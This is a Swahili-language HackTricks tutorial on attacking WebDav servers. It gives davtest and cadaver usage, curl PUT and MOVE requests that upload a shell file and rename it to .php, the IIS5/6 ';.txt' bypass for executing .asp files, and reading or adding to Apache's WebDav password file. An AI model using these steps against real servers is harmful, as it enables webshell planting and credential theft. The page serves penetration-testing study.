WebDav

Tumia Trickest kujenga na kutumia workflows kwa urahisi zinazotumia zana za jamii ya juu zaidi duniani. Pata Ufikiaji Leo:

Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

Unaposhughulika na HTTP Server yenye WebDav imewezeshwa, ni rahisi kudhibiti faili ikiwa una sifa sahihi, kawaida huthibitishwa kupitia Uthibitishaji wa Msingi wa HTTP. Kupata udhibiti juu ya seva kama hiyo mara nyingi hujumuisha kupakia na kutekeleza webshell.

Kupata ufikiaji wa seva ya WebDav kawaida inahitaji sifa halali, na WebDav bruteforce ikiwa njia ya kawaida ya kuzipata.

Ili kushinda vizuizi kwenye kupakia faili, hasa vile vinavyozuia utekelezaji wa skripti za upande wa seva, unaweza:

  • Kupakia faili zenye nyongeza za kutekelezeka moja kwa moja ikiwa hazijazuiliwa.

  • Kubadilisha jina la faili zilizopakiwa zisizo za kutekelezeka (kama .txt) kuwa nyongeza inayoweza kutekelezeka.

  • Nakili faili zilizopakiwa zisizo za kutekelezeka, zikibadilisha nyongeza yao kuwa moja inayoweza kutekelezeka.

DavTest

Davtest jaribu kupakia faili kadhaa zenye nyongeza tofauti na angalia ikiwa nyongeza ina kutekelezwa:

davtest [-auth user:password] -move -sendbd auto -url http://<IP> #Uplaod .txt files and try to move it to other extensions
davtest [-auth user:password] -sendbd auto -url http://<IP> #Try to upload every extension
![](<../../.gitbook/assets/image (851).png>)

Hii haimaanishi kwamba **.txt** na **.html extensions zinatekelezwa**. Hii inamaanisha kwamba unaweza **kufikia faili hizi** kupitia wavuti.

## Cadaver

Unaweza kutumia chombo hiki ku **kuunganisha kwenye seva ya WebDav** na kutekeleza vitendo (kama **kupakia**, **kuhamisha** au **kufuta**) **kwa mkono**.
cadaver <IP>

Ombi la PUT

curl -T 'shell.txt' 'http://$ip'

Ombi la KUHAMISHA

curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'

Tumia Trickest kujenga na kutumia mchakato wa kiotomatiki ulioendeshwa na zana za jamii za juu zaidi duniani. Pata Ufikiaji Leo:

IIS5/6 WebDav Udhaifu

Udhaifu huu ni wa kuvutia sana. WebDav haikubali kupakia au kubadilisha jina la faili lenye kielezo .asp. Lakini unaweza kipuuzia hili kwa kuongeza mwishoni mwa jina ";.txt" na faili ita tekelezwa kana kwamba ni faili ya .asp (unaweza pia kutumia ".html" badala ya ".txt" lakini USISAHAU ";").

Kisha unaweza kupakia kabati yako kama faili ya ".txt" na nakili/hamisha kwa faili ya ".asp;.txt". Ukifika kwenye faili hiyo kupitia mtandao, ita tekelezwa (cadaver itasema kuwa hatua ya kuhamisha haikufanya kazi, lakini ilifanya kazi).

Tuma siri

Ikiwa Webdav ilikuwa inatumia seva ya Apache unapaswa kutazama tovuti zilizowekwa katika Apache. Kawaida: /etc/apache2/sites-enabled/000-default

Ndani yake unaweza kupata kitu kama:

ServerAdmin webmaster@localhost
Alias /webdav /var/www/webdav
<Directory /var/www/webdav>
DAV On
AuthType Digest
AuthName "webdav"
AuthUserFile /etc/apache2/users.password
Require valid-user

Kama unavyoweza kuona kuna faili zenye vyeti halali kwa serveri ya webdav:

/etc/apache2/users.password

Ndani ya aina hii ya faili utapata jina la mtumiaji na hash ya nenosiri. Hizi ni anwani za seva ya webdav inayotumia kuthibitisha watumiaji.

Unaweza kujaribu kuvunja au kuongeza zaidi ikiwa kwa sababu fulani unataka kupata seva ya webdav:

htpasswd /etc/apache2/users.password <USERNAME> #You will be prompted for the password

Ili kujua ikiwa vibali vipya vinafanya kazi unaweza kufanya:

wget --user <USERNAME> --ask-password http://domain/path/to/webdav/ -O - -q

Marejeo

Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Tumia Trickest kujenga na kutumia workflows kwa urahisi zinazotumia zana za jamii za juu zaidi duniani. Pata Ufikiaji Leo:

Last updated